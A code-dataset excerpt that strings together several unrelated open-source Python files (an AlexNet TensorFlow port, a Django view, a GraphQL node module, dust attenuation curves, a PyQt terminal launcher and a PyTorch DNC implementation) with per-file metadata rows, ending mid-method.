fc7 = fc(dropout6, 4096, 4096, name='fc7')
dropout7 = dropout(fc7, self.KEEP_PROB)
# 8th Layer: FC and return unscaled activations
self.fc8 = fc(dropout7, 4096, self.NUM_CLASSES, relu=False, name='fc8')
def load_initial_weights(self, session):
"""Load weights from file into network.
As the weights from http://www.cs.toronto.edu/~guerzhoy/tf_alexnet/
come as a dict of lists (e.g. weights['conv1'] is a list) and not as
dict of dicts (e.g. weights['conv1'] is a dict with keys 'weights' &
'biases') we need a special load function
"""
# Load the weights into memory
weights_dict = np.load(self.WEIGHTS_PATH, encoding='bytes').item()
# Loop over all layer names stored in the weights dict
for op_name in weights_dict:
# Check if layer should be trained from scratch
if op_name not in self.SKIP_LAYER:
with tf.variable_scope(op_name, reuse=True):
# Assign weights/biases to their corresponding tf variable
for data in weights_dict[op_name]:
# Biases
if len(data.shape) == 1:
var = tf.get_variable('biases', trainable=False)
session.run(var.assign(data))
# Weights
else:
var = tf.get_variable('weights', trainable=False)
session.run(var.assign(data))
def conv(x, filter_height, filter_width, num_filters, stride_y, stride_x, name,
padding='SAME', groups=1):
"""Create a convolution layer.
Adapted from: https://github.com/ethereon/caffe-tensorflow
"""
# Get number of input channels
input_channels = int(x.get_shape()[-1])
# Create lambda function for the convolution
convolve = lambda i, k: tf.nn.conv2d(i, k,
strides=[1, stride_y, stride_x, 1],
padding=padding)
with tf.variable_scope(name) as scope:
# Create tf variables for the weights and biases of the conv layer
weights = tf.get_variable('weights', shape=[filter_height,
filter_width,
input_channels/groups,
num_filters])
biases = tf.get_variable('biases', shape=[num_filters])
if groups == 1:
conv = convolve(x, weights)
# In the cases of multiple groups, split inputs & weights and
else:
# Split input and weights and convolve them separately
input_groups = tf.split(axis=3, num_or_size_splits=groups, value=x)
weight_groups = tf.split(axis=3, num_or_size_splits=groups,
value=weights)
output_groups = [convolve(i, k) for i, k in zip(input_groups, weight_groups)]
# Concat the convolved output together again
conv = tf.concat(axis=3, values=output_groups)
# Add biases
bias = tf.reshape(tf.nn.bias_add(conv, biases), tf.shape(conv))
# Apply relu function
relu = tf.nn.relu(bias, name=scope.name)
return relu
def fc(x, num_in, num_out, name, relu=True):
"""Create a fully connected layer."""
with tf.variable_scope(name) as scope:
# Create tf variables for the weights and biases
weights = tf.get_variable('weights', shape=[num_in, num_out],
trainable=True)
biases = tf.get_variable('biases', [num_out], trainable=True)
# Matrix multiply weights and inputs and add bias
act = tf.nn.xw_plus_b(x, weights, biases, name=scope.name)
if relu:
# Apply ReLu non linearity
relu = tf.nn.relu(act)
return relu
else:
return act
def max_pool(x, filter_height, filter_width, stride_y, stride_x, name,
padding='SAME'):
"""Create a max pooling layer."""
return tf.nn.max_pool(x, ksize=[1, filter_height, filter_width, 1],
strides=[1, stride_y, stride_x, 1],
padding=padding, name=name)
def lrn(x, radius, alpha, beta, name, bias=1.0):
"""Create a local response normalization layer."""
return tf.nn.local_response_normalization(x, depth_radius=radius,
alpha=alpha, beta=beta,
bias=bias, name=name)
def dropout(x, keep_prob):
"""Create a dropout layer."""
return tf.nn.dropout(x, keep_prob)
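# Illustrative wiring of the class above (not part of the original file); the
# 227x227x3 input and the 'bvlc_alexnet.npy' weight file are the usual
# assumptions for this port.
#
#   x = tf.placeholder(tf.float32, [None, 227, 227, 3])
#   keep_prob = tf.placeholder(tf.float32)
#   model = AlexNet(x, keep_prob, num_classes=2, skip_layer=['fc8'])
#   score = model.fc8  # unscaled logits of the re-initialized 2-class head
#   with tf.Session() as sess:
#       sess.run(tf.global_variables_initializer())
#       model.load_initial_weights(sess)  # loads every layer except 'fc8'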
| apache-2.0 | -1,476,436,430,964,266,200 | 37.176166 | 102 | 0.564332 | false | 3.761103 | false | false | false |
jgsogo/neutron | webapp/question/wordalternate/views/run_wordalternate.py | 1 | 2058 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.views.generic import TemplateView
from django.utils.translation import ugettext_lazy as _
from neutron.models import Meaning, WordAlternate, Word
from neutron.views import WordAlternateRandomMeaningRun
from ..forms import WordAlternateForm
import logging
log = logging.getLogger(__name__)
class WordAlternateHome(TemplateView):
template_name = 'wordalternate/home.html'
class WordAlternateRun(WordAlternateRandomMeaningRun):
form_class = WordAlternateForm
template_name = 'wordalternate/run.html'
def form_valid(self, form, time_elapsed=None):
meaning = Meaning.objects.get(pk=form.cleaned_data['item'])
button = form.cleaned_data['button']
word_alternate = WordAlternate(meaning=meaning)
if button == 0:
value = form.cleaned_data['value']
if not value:
# Jump to another item but keep track of error
log.error("WordAlternateRun form error, user '{}' left value field empty.".format(self.request.user))
return super(WordAlternateRun, self).form_valid(form=None)
            alternate, _created = Word.objects.get_or_create(word=value)  # "_created" avoids shadowing the ugettext_lazy alias "_"
alternate_meaning = Meaning(word=alternate, definition=meaning.definition)
alternate_meaning.informer = self.request.user.as_informer()
alternate_meaning.excluded = True # TODO: May I accept directly new words?
alternate_meaning.save()
word_alternate.value = alternate_meaning
word_alternate.informer = self.request.user.as_informer()
word_alternate.interface = self.interface
word_alternate.elapsed_time = time_elapsed
word_alternate.save()
return super(WordAlternateRun, self).form_valid(form=None)
def get_context_data(self, **kwargs):
context = super(WordAlternateRun, self).get_context_data(**kwargs)
context.update({'button_items': [(0, _("Set alternate")), (1, _("Can't remember now"))]})
return context
| gpl-2.0 | 6,908,316,499,432,080,000 | 39.352941 | 117 | 0.677357 | false | 3.93499 | false | false | false |
gordon-elliott/glod | src/glod/api/account_node.py | 1 | 1157 | __copyright__ = 'Copyright(c) Gordon Elliott 2017'
"""
"""
import graphene
from a_tuin.api import (
node_class,
node_connection_field,
get_update_mutation,
get_create_mutation,
get_local_fields
)
from glod.api.account_leaf import AccountLeaf
from glod.api.fund_node import FundLeaf
from glod.db.account import Account, AccountQuery
account_fields = get_local_fields(Account)
account_node_fields = account_fields.copy()
# TODO can we derive this from the model references?
account_node_fields['funds'] = graphene.Field(
graphene.List(FundLeaf, description='Funds for this account.')
)
AccountNode = node_class(Account.__name__, AccountLeaf, account_node_fields)
accounts_connection_field = node_connection_field(
Account,
AccountQuery,
AccountNode,
description='List of all bank accounts'
)
accounts_options_field = node_connection_field(
Account,
AccountQuery,
AccountLeaf,
description='List of all bank accounts for select fields'
)
CreateAccountLeaf = get_create_mutation(Account, account_fields, AccountLeaf)
UpdateAccountLeaf = get_update_mutation(Account, account_fields, AccountLeaf)
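# Illustrative query shape served by accounts_connection_field above; the
# "accounts" root field name and the node fields are assumptions that depend
# on how the wider schema mounts these connection fields:
#
#   query {
#     accounts(first: 5) {
#       edges {
#         node {
#           funds { name }   # hypothetical FundLeaf field
#         }
#       }
#     }
#   }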
| mit | -5,361,489,816,740,549,000 | 24.711111 | 77 | 0.744166 | false | 3.495468 | false | false | false |
bd-j/sedpy | sedpy/attenuation.py | 1 | 12519 | import numpy as np
import warnings
import sys
# --------------------
# ATTENUATION CURVES
# --------------------
def powerlaw(wave, tau_v=1, alpha=1.0, **kwargs):
"""Simple power-law attenuation, normalized to 5500\AA.
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:returns tau:
The optical depth at each wavelength.
"""
return tau_v * (wave / 5500)**(-alpha)
def calzetti(wave, tau_v=1, R_v=4.05, **kwargs):
"""Calzetti et al. 2000 starburst attenuation curve, with
extrapolations to the FUV and NIR.
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the attenuation curve.
:param R_v: (default: 4.05)
The ratio of total selective extinction, parameterizing the slope of
the attenuation curve. A_v = R_v * E(B-V)
:returns tau:
The optical depth at each wavelength.
"""
# optical/NIR
k1 = lambda x: 2.659 * (-1.857 + 1.040 * x)
# UV
k2 = lambda x: 2.659 * (-2.156 + 1.509 * x - 0.198 * x**2. + 0.011 * x**3.)
# get slopes at edges and k(5500)
uv = np.array([0.12, 0.13]) * 1e4
kuv = k2(1e4 / uv) + R_v
uv_slope = np.diff(kuv) / np.diff(uv)
ir = np.array([2.19, 2.20]) * 1e4
kir = k1(1e4 / ir) + R_v
ir_slope = np.diff(kir) / np.diff(ir)
k_v = k2(1e4 / 5500.) + R_v
# define segments
uinds = (wave >= 1200.) & (wave < 6300) # uv
oinds = (wave >= 6300.) & (wave <= 22000) # optical
xinds = (wave < 1200.) # xuv
iinds = (wave > 22000.) # ir
# do it
x = 1e4 / wave
ktot = oinds * (k1(x) + R_v)
ktot += uinds * (k2(x) + R_v)
ktot += xinds * (kuv[0] + (wave - uv[0]) * uv_slope)
ktot += iinds * (kir[1] + (wave - ir[1]) * ir_slope)
ktot[ktot < 0] = 0
tau_lambda = tau_v * (ktot / k_v)
return tau_lambda
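# Quick sanity example for the two curves above (values follow from the
# formulas; tau at 5500 AA reproduces tau_v by construction):
#
#   >>> wave = np.array([1500., 5500., 22000.])
#   >>> powerlaw(wave, tau_v=1.0, alpha=1.0)
#   array([3.66666667, 1.        , 0.25      ])
#   >>> calzetti(np.array([5500.]), tau_v=1.0)
#   array([1.])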
def drude(x, x0=4.59, gamma=0.90, **extras):
"""Drude profile for the 2175AA bump.
:param x:
Inverse wavelength (inverse microns) at which values for the drude
profile are requested.
:param gamma:
Width of the Drude profile (inverse microns).
:param x0:
Center of the Drude profile (inverse microns).
:returns k_lambda:
The value of the Drude profile at x, normalized such that the peak is 1.
"""
#return (w * gamma)**2 / ((w**2 - w0**2)**2 + (w * gamma)**2)
return (x*gamma)**2 / ((x**2 - x0**2)**2 + (x * gamma)**2)
def noll(wave, tau_v=1, delta=0.0, c_r=0.0, Ebump=0.0, **kwargs):
"""Noll 2009 attenuation curve. This is based on the Calzetti curve, with
added variable bump (as Drude) and overall slope change. Any extra
keywords are passed to the Drude (e.g. x0, gamma, both in inverse microns).
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the attenuation curve.
:param Ebump: (default: 0.0)
Stength of the 2175\AA bump. Normalizes the Drude profile.
:param delta: (default 0.)
Slope of the power-law that modifies the Calzetti curve.
:param c_r:
Constant used to alter R_v=A_V/E(B-V) of the curve. To maintain the
Calzetti R_v=4.05, use c_r = -delta. Note that even with c_r = -delta
the calzetti curve will not be recovered unless delta=0
:returns tau:
The optical depth at each wavelength.
"""
kcalz = calzetti(wave, tau_v=1.0, R_v=4.05) - 1
k = kcalz + Ebump / 4.05 * drude(1e4 / wave, **kwargs)
a = (k * (1 - 1.12 * c_r) + 1) * (wave / 5500.)**delta
return a * tau_v
def chevallard(wave, tau_v=1, **kwargs):
""" \tau_v dependent attenuation curves matched to disk RT models,
as in Chevallard et al. 2013. No UV bump (or indeed tests in the
UV at all).
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:returns tau:
The optical depth at each wavelength.
"""
# missing a UV bump
alpha_v = 2.8 / (1 + np.sqrt(tau_v)) # +/- 25%
bb = 0.3 - 0.05 * tau_v # +/- 10%
alpha = alpha_v + bb * (wave * 1e-4 - 0.55)
tau_lambda = tau_v * (wave / 5500.0)**(-alpha)
return tau_lambda
def conroy(wave, tau_v=1, R_v=3.1, f_bump=0.6, **kwargs):
""" Conroy & Schiminovich 2010 dust attenuation curves including a
decreased UV bump.
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:param R_v: (default: 3.1)
The ratio of total selective extinction, parameterizing the
slope of the attenuation curve. A_v = R_v * E(B-V)
:param f_bump: (default: 0.6)
The strength of the 2175\AA UV bump, as a fraction of the bump
strength in Cardelli et al. extinction curve.
:returns tau:
The optical depth at each wavelength.
"""
x = 1e4 / wave
nx = x.shape[0]
a = np.zeros_like(x)
b = np.zeros_like(x)
# IR 0.909 - 3.3 micron
ir = (x >= 0.3) & (x < 1.1)
a[ir] = 0.574 * x[ir]**1.61
b[ir] = -0.527 * x[ir]**1.61
# optical 0.303 - 0.909 micron
opt = (x >= 1.1) & (x < 3.3)
y = x[opt]-1.82
a[opt] = (1 + 0.177 * y - 0.504 * y**2 - 0.0243 * y**3 +
0.721 * y**4 + 0.0198 * y**5 - 0.7750 * y**6 +
0.330 * y**7)
b[opt] = (1.413 * y + 2.283 * y**2 + 1.072 * y**3 -
5.384 * y**4 - 0.622 * y**5 + 5.303 * y**6 -
2.090 * y**7)
# NUV 0.17 to 0.303 micron
nuv = (x >= 3.3) & (x < 5.9)
tmp = (-0.0370 + 0.0469 * f_bump - 0.601 * f_bump / R_v + 0.542 / R_v)
fa = (3.3 / x[nuv])**6. * tmp
tmp = 0.104 * f_bump / ((x[nuv] - 4.67)**2 + 0.341)
a[nuv] = 1.752 - 0.316 * x[nuv] - tmp + fa
tmp = 1.206 * f_bump / ((x[nuv] - 4.62)**2 + 0.263)
b[nuv] = -3.09 + 1.825 * x[nuv] + tmp
# FUV 0.125 - 0.17 micron
fuv = (x >= 5.9) & (x < 8.0)
fa = -0.0447 * (x[fuv] - 5.9)**2.0 - 0.00978 * (x[fuv] - 5.9)**3
fb = 0.213 * (x[fuv] - 5.9)**2. + 0.121 * (x[fuv] - 5.9)**3
tmp = 0.104 * f_bump / ((x[fuv] - 4.67)**2 + 0.341)
a[fuv] = 1.752 - 0.316 * x[fuv] - tmp + fa
tmp = 1.206 * f_bump / ((x[fuv] - 4.62)**2 + 0.263)
b[fuv] = -3.09 + 1.825 * x[fuv] + tmp + fb
alam = (a + b / R_v)
# XUV below 1250AA
xuv = x >= 8.0
x8 = 8.0
fa = -0.0447 * (x8 - 5.9)**2 - 0.00978 * (x8 - 5.9)**3
fb = 0.213 * (x8 - 5.9)**2. + 0.121 * (x8 - 5.9)**3
tmp = 0.104 * f_bump / ((x8 - 4.67)**2 + 0.341)
af = 1.752 - 0.316 * x8 - tmp + fa
tmp = 1.206 * f_bump / ((x8 - 4.62)**2 + 0.263)
bf = -3.09 + 1.825 * x8 + tmp + fb
a8 = (af + bf / R_v)
alam[xuv] = (x8 / x[xuv])**(-1.3) * a8
return tau_v * alam
def broken_powerlaw(wave, tau_v=1, alpha=[0.7, 0.7, 0.7],
breaks=[0, 3000, 10000, 4e4], **kwargs):
""" Attenuation curve as in V. Wild et al. 2011, i.e. power-law
slope can change between regions. Superceded by Chevallard 2013
for optical/NIR.
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:returns tau:
The optical depth at each wavelength.
"""
    if len(breaks) != len(alpha) + 1:
        print("make sure of your power law breaks")
    tau = np.zeros(len(wave))
    for i in range(len(alpha)):
        inds = (wave > breaks[i]) & (wave <= breaks[i+1])
        tau[inds] = tau_v * (wave[inds] / 5500)**alpha[i]
return tau
def wg00(wave, tau_v=1, geometry='SHELL', composition='MW',
local='homogenous', **kwargs):
""" Witt+Gordon 2000 DIRTY radiative transfer results, for
idealized geometries.
"""
pass
# ------------------
# EXTINCTION CURVES
# ------------------
def cardelli(wave, tau_v=1, R_v=3.1, **kwargs):
""" Cardelli, Clayton, and Mathis 1998 Milky Way extinction curve,
with an update in the near-UV from O'Donnell 1994
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:param R_v: (default: 3.1)
The ratio of total selective extinction, parameterizing the
slope of the attenuation curve. A_v = R_v * E(B-V)
:returns tau:
The optical depth at each wavelength.
"""
# if (wave < 1e3).any() :
# warnings.warn('Cardelli: extinction not defined (set to zero) below 1000AA')
mic = wave*1e-4
x_sup, x_inf = 10.0, 0.3
x = 1 / mic
a = np.zeros_like(x)
b = np.zeros_like(x)
w1 = (x >= 1.1) & (x <= 3.3) # Optical 0.303 to 0.909 micron
w2 = (x >= x_inf) & (x < 1.1) # NIR 0.909 to 3.3 micron
w3 = (x > 3.3) & (x <= 8) # UV 0.125 - 0.303 micron
w4 = (x > 8.0) & (x <= x_sup) # XUV, 1000 -1250AA
wsh = x > x_sup
wlg = x < x_inf
y = x[w1] - 1.82
a[w1] = (1 + 0.17699 * y - 0.50447 * y**2. - 0.02427 * y**3. +
0.72085 * y**4. + 0.01979 * y**5. - 0.77530 * y**6. +
0.32999 * y**7.0)
b[w1] = (1.41338 * y + 2.28305 * y**2. + 1.07233 * y**3. -
5.38434 * y**4. - 0.62251 * y**5. + 5.30260 * y**6. -
2.09002 * y**7.)
y = x[w2]**1.61
a[w2] = 0.574 * y
b[w2] = -0.527 * y
fa = x[w3] * 0.
fb = x[w3] * 0.
ou = (x[w3] > 5.9)
# print(type(ou),ou[0], type(w3))
if ou.any():
y = x[w3][ou] - 5.9
fa[ou] = -0.04473 * y**2. - 0.009779 * y**3.
fb[ou] = 0.2130 * y**2. + 0.1207 * y**3.
a[w3] = 1.752 - 0.316 * x[w3] - 0.104 / ((x[w3] - 4.67)**2. + 0.341) + fa
b[w3] = -3.090 + 1.825 * x[w3] + 1.206 / ((x[w3] - 4.62)**2. + 0.263) + fb
y = x[w4] - 8.
a[w4] = -1.073 - 0.628 * y + 0.137 * y**2. - 0.070 * y**3.
b[w4] = 13.670 + 4.257 * y - 0.420 * y**2. + 0.374 * y**3.
tau = a + b / R_v
return tau_v * tau
def smc(wave, tau_v=1, **kwargs):
"""Pei 1992 SMC extinction curve.
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:returns tau:
The optical depth at each wavelength.
"""
if (wave < 1e3).any():
warnings.warn('SMC: extinction extrapolation below 1000AA is poor')
mic = wave * 1e-4
aa = [185., 27., 0.005, 0.010, 0.012, 0.030]
ll = [0.042, 0.08, 0.22, 9.7, 18., 25.]
bb = [90., 5.50, -1.95, -1.95, -1.80, 0.00]
nn = [2.0, 4.0, 2.0, 2.0, 2.0, 2.0]
abs_ab = np.zeros_like(mic)
norm_v = 0 # hack to go from tau_b to tau_v
mic_5500 = 5500 * 1e-4
for i, a in enumerate(aa):
norm_v += aa[i] / ((mic_5500 / ll[i])**nn[i] +
(ll[i] / mic_5500)**nn[i] + bb[i])
abs_ab += aa[i] / ((mic / ll[i])**nn[i] + (ll[i] / mic)**nn[i] + bb[i])
return tau_v * (abs_ab / norm_v)
def lmc(wave, tau_v=1, **kwargs):
""" Pei 1992 LMC extinction curve.
:param wave:
The wavelengths at which optical depth estimates are desired.
:param tau_v: (default: 1)
The optical depth at 5500\AA, used to normalize the
attenuation curve.
:returns tau:
The optical depth at each wavelength.
"""
if (wave < 1e3).any():
warnings.warn('LMC: extinction extrapolation below 1000AA is poor')
mic = wave * 1e-4
aa = [175., 19., 0.023, 0.005, 0.006, 0.020]
ll = [0.046, 0.08, 0.22, 9.7, 18., 25.]
bb = [90., 5.50, -1.95, -1.95, -1.80, 0.00]
nn = [2.0, 4.5, 2.0, 2.0, 2.0, 2.0]
abs_ab = mic * 0.
norm_v = 0 # hack to go from tau_b to tau_v
mic_5500 = 5500 * 1e-4
for i, a in enumerate(aa):
norm_v += aa[i] / ((mic_5500 / ll[i])**nn[i] +
(ll[i] / mic_5500)**nn[i] + bb[i])
abs_ab += aa[i] / ((mic / ll[i])**nn[i] + (ll[i] / mic)**nn[i] + bb[i])
return tau_v * (abs_ab / norm_v)
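# Minimal comparison sketch (illustrative, not part of the original module):
# evaluate several of the curves above on a common wavelength grid.
if __name__ == '__main__':
    wave = np.linspace(1500., 25000., 50)
    for curve in (powerlaw, calzetti, cardelli, smc, lmc):
        tau = curve(wave, tau_v=1.0)
        print('{0:>9s}: tau(1500AA) = {1:.2f}'.format(curve.__name__, tau[0]))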
| gpl-2.0 | 6,990,991,466,777,430,000 | 31.1 | 86 | 0.529675 | false | 2.601621 | false | false | false |
jjgomera/pychemqt | tools/terminal.py | 1 | 2742 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
'''Pychemqt, Chemical Engineering Process simulator
Copyright (C) 2009-2017, Juan José Gómez Romera <jjgomera@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.'''
###############################################################################
# Tools to create a python shell with pychemqt libraries imported
# For now only work in linux with xterm as terminal
###############################################################################
import atexit
from PyQt5 import QtCore, QtWidgets
from tools.firstrun import which
class XTerm(QtCore.QProcess):
"""Gui container for terminal widget"""
def __init__(self, config, parent=None):
super(XTerm, self).__init__(parent)
self.config = config
atexit.register(self.kill)
self.show_term()
def sizeHint(self):
size = QtCore.QSize(400, 300)
return size.expandedTo(QtWidgets.QApplication.globalStrut())
def show_term(self):
term = self.config.get("Applications", 'Shell')
args = [
"-bg", self.config.get("Applications", "backgroundColor"),
"-fg", self.config.get("Applications", "foregroundColor"),
# blink cursor
"-bc",
# title
"-T", QtWidgets.QApplication.translate(
"pychemqt", "pychemqt python console")]
if self.config.getboolean("Applications", "maximized"):
args.append("-maximized")
if self.config.getboolean("Applications", 'ipython') and \
which("ipython"):
args.append("ipython3")
else:
args.append("python3")
self.start(term, args)
if self.error() == QtCore.QProcess.FailedToStart:
print("xterm not installed")
if __name__ == "__main__":
import sys
from configparser import ConfigParser
import os
app = QtWidgets.QApplication(sys.argv)
conf_dir = os.path.expanduser('~') + "/.pychemqt/"
pychemqt_dir = os.environ["PWD"] + "/"
preferences = ConfigParser()
preferences.read(conf_dir+"pychemqtrc")
terminal = XTerm(preferences)
app.exec_()
| gpl-3.0 | 4,019,939,832,573,192,000 | 32.012048 | 79 | 0.617518 | false | 4.22188 | true | false | false |
ixaxaar/pytorch-dnc | dnc/dnc.py | 1 | 10617 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import torch.nn as nn
import torch as T
from torch.autograd import Variable as var
import numpy as np
from torch.nn.utils.rnn import pad_packed_sequence as pad
from torch.nn.utils.rnn import pack_padded_sequence as pack
from torch.nn.utils.rnn import PackedSequence
from .util import *
from .memory import *
from torch.nn.init import orthogonal_, xavier_uniform_
class DNC(nn.Module):
def __init__(
self,
input_size,
hidden_size,
rnn_type='lstm',
num_layers=1,
num_hidden_layers=2,
bias=True,
batch_first=True,
dropout=0,
bidirectional=False,
nr_cells=5,
read_heads=2,
cell_size=10,
nonlinearity='tanh',
gpu_id=-1,
independent_linears=False,
share_memory=True,
debug=False,
clip=20
):
super(DNC, self).__init__()
# todo: separate weights and RNNs for the interface and output vectors
self.input_size = input_size
self.hidden_size = hidden_size
self.rnn_type = rnn_type
self.num_layers = num_layers
self.num_hidden_layers = num_hidden_layers
self.bias = bias
self.batch_first = batch_first
self.dropout = dropout
self.bidirectional = bidirectional
self.nr_cells = nr_cells
self.read_heads = read_heads
self.cell_size = cell_size
self.nonlinearity = nonlinearity
self.gpu_id = gpu_id
self.independent_linears = independent_linears
self.share_memory = share_memory
self.debug = debug
self.clip = clip
self.w = self.cell_size
self.r = self.read_heads
self.read_vectors_size = self.r * self.w
self.output_size = self.hidden_size
self.nn_input_size = self.input_size + self.read_vectors_size
self.nn_output_size = self.output_size + self.read_vectors_size
self.rnns = []
self.memories = []
for layer in range(self.num_layers):
if self.rnn_type.lower() == 'rnn':
self.rnns.append(nn.RNN((self.nn_input_size if layer == 0 else self.nn_output_size), self.output_size,
bias=self.bias, nonlinearity=self.nonlinearity, batch_first=True, dropout=self.dropout, num_layers=self.num_hidden_layers))
elif self.rnn_type.lower() == 'gru':
self.rnns.append(nn.GRU((self.nn_input_size if layer == 0 else self.nn_output_size),
self.output_size, bias=self.bias, batch_first=True, dropout=self.dropout, num_layers=self.num_hidden_layers))
if self.rnn_type.lower() == 'lstm':
self.rnns.append(nn.LSTM((self.nn_input_size if layer == 0 else self.nn_output_size),
self.output_size, bias=self.bias, batch_first=True, dropout=self.dropout, num_layers=self.num_hidden_layers))
setattr(self, self.rnn_type.lower() + '_layer_' + str(layer), self.rnns[layer])
# memories for each layer
if not self.share_memory:
self.memories.append(
Memory(
input_size=self.output_size,
mem_size=self.nr_cells,
cell_size=self.w,
read_heads=self.r,
gpu_id=self.gpu_id,
independent_linears=self.independent_linears
)
)
setattr(self, 'rnn_layer_memory_' + str(layer), self.memories[layer])
# only one memory shared by all layers
if self.share_memory:
self.memories.append(
Memory(
input_size=self.output_size,
mem_size=self.nr_cells,
cell_size=self.w,
read_heads=self.r,
gpu_id=self.gpu_id,
independent_linears=self.independent_linears
)
)
setattr(self, 'rnn_layer_memory_shared', self.memories[0])
# final output layer
self.output = nn.Linear(self.nn_output_size, self.input_size)
orthogonal_(self.output.weight)
if self.gpu_id != -1:
[x.cuda(self.gpu_id) for x in self.rnns]
[x.cuda(self.gpu_id) for x in self.memories]
self.output.cuda()
def _init_hidden(self, hx, batch_size, reset_experience):
# create empty hidden states if not provided
if hx is None:
hx = (None, None, None)
(chx, mhx, last_read) = hx
# initialize hidden state of the controller RNN
if chx is None:
h = cuda(T.zeros(self.num_hidden_layers, batch_size, self.output_size), gpu_id=self.gpu_id)
xavier_uniform_(h)
chx = [ (h, h) if self.rnn_type.lower() == 'lstm' else h for x in range(self.num_layers)]
# Last read vectors
if last_read is None:
last_read = cuda(T.zeros(batch_size, self.w * self.r), gpu_id=self.gpu_id)
# memory states
if mhx is None:
if self.share_memory:
mhx = self.memories[0].reset(batch_size, erase=reset_experience)
else:
mhx = [m.reset(batch_size, erase=reset_experience) for m in self.memories]
else:
if self.share_memory:
mhx = self.memories[0].reset(batch_size, mhx, erase=reset_experience)
else:
mhx = [m.reset(batch_size, h, erase=reset_experience) for m, h in zip(self.memories, mhx)]
return chx, mhx, last_read
def _debug(self, mhx, debug_obj):
if not debug_obj:
debug_obj = {
'memory': [],
'link_matrix': [],
'precedence': [],
'read_weights': [],
'write_weights': [],
'usage_vector': [],
}
debug_obj['memory'].append(mhx['memory'][0].data.cpu().numpy())
debug_obj['link_matrix'].append(mhx['link_matrix'][0][0].data.cpu().numpy())
debug_obj['precedence'].append(mhx['precedence'][0].data.cpu().numpy())
debug_obj['read_weights'].append(mhx['read_weights'][0].data.cpu().numpy())
debug_obj['write_weights'].append(mhx['write_weights'][0].data.cpu().numpy())
debug_obj['usage_vector'].append(mhx['usage_vector'][0].unsqueeze(0).data.cpu().numpy())
return debug_obj
def _layer_forward(self, input, layer, hx=(None, None), pass_through_memory=True):
(chx, mhx) = hx
# pass through the controller layer
input, chx = self.rnns[layer](input.unsqueeze(1), chx)
input = input.squeeze(1)
# clip the controller output
if self.clip != 0:
output = T.clamp(input, -self.clip, self.clip)
else:
output = input
# the interface vector
ξ = output
# pass through memory
if pass_through_memory:
if self.share_memory:
read_vecs, mhx = self.memories[0](ξ, mhx)
else:
read_vecs, mhx = self.memories[layer](ξ, mhx)
# the read vectors
read_vectors = read_vecs.view(-1, self.w * self.r)
else:
read_vectors = None
return output, (chx, mhx, read_vectors)
def forward(self, input, hx=(None, None, None), reset_experience=False, pass_through_memory=True):
# handle packed data
is_packed = type(input) is PackedSequence
if is_packed:
input, lengths = pad(input)
max_length = lengths[0]
else:
max_length = input.size(1) if self.batch_first else input.size(0)
lengths = [input.size(1)] * max_length if self.batch_first else [input.size(0)] * max_length
batch_size = input.size(0) if self.batch_first else input.size(1)
        if not self.batch_first:
            # make the data batch-first
            input = input.transpose(0, 1)
controller_hidden, mem_hidden, last_read = self._init_hidden(hx, batch_size, reset_experience)
# concat input with last read (or padding) vectors
inputs = [T.cat([input[:, x, :], last_read], 1) for x in range(max_length)]
# batched forward pass per element / word / etc
if self.debug:
viz = None
outs = [None] * max_length
read_vectors = None
# pass through time
for time in range(max_length):
# pass thorugh layers
for layer in range(self.num_layers):
# this layer's hidden states
chx = controller_hidden[layer]
m = mem_hidden if self.share_memory else mem_hidden[layer]
# pass through controller
outs[time], (chx, m, read_vectors) = \
self._layer_forward(inputs[time], layer, (chx, m), pass_through_memory)
# debug memory
if self.debug:
viz = self._debug(m, viz)
# store the memory back (per layer or shared)
if self.share_memory:
mem_hidden = m
else:
mem_hidden[layer] = m
controller_hidden[layer] = chx
if read_vectors is not None:
# the controller output + read vectors go into next layer
outs[time] = T.cat([outs[time], read_vectors], 1)
else:
outs[time] = T.cat([outs[time], last_read], 1)
inputs[time] = outs[time]
if self.debug:
viz = {k: np.array(v) for k, v in viz.items()}
viz = {k: v.reshape(v.shape[0], v.shape[1] * v.shape[2]) for k, v in viz.items()}
# pass through final output layer
inputs = [self.output(i) for i in inputs]
outputs = T.stack(inputs, 1 if self.batch_first else 0)
if is_packed:
            outputs = pack(outputs, lengths)
if self.debug:
return outputs, (controller_hidden, mem_hidden, read_vectors), viz
else:
return outputs, (controller_hidden, mem_hidden, read_vectors)
def __repr__(self):
s = "\n----------------------------------------\n"
s += '{name}({input_size}, {hidden_size}'
if self.rnn_type != 'lstm':
s += ', rnn_type={rnn_type}'
if self.num_layers != 1:
s += ', num_layers={num_layers}'
if self.num_hidden_layers != 2:
s += ', num_hidden_layers={num_hidden_layers}'
if self.bias != True:
s += ', bias={bias}'
if self.batch_first != True:
s += ', batch_first={batch_first}'
if self.dropout != 0:
s += ', dropout={dropout}'
if self.bidirectional != False:
s += ', bidirectional={bidirectional}'
if self.nr_cells != 5:
s += ', nr_cells={nr_cells}'
if self.read_heads != 2:
s += ', read_heads={read_heads}'
if self.cell_size != 10:
s += ', cell_size={cell_size}'
if self.nonlinearity != 'tanh':
s += ', nonlinearity={nonlinearity}'
if self.gpu_id != -1:
s += ', gpu_id={gpu_id}'
if self.independent_linears != False:
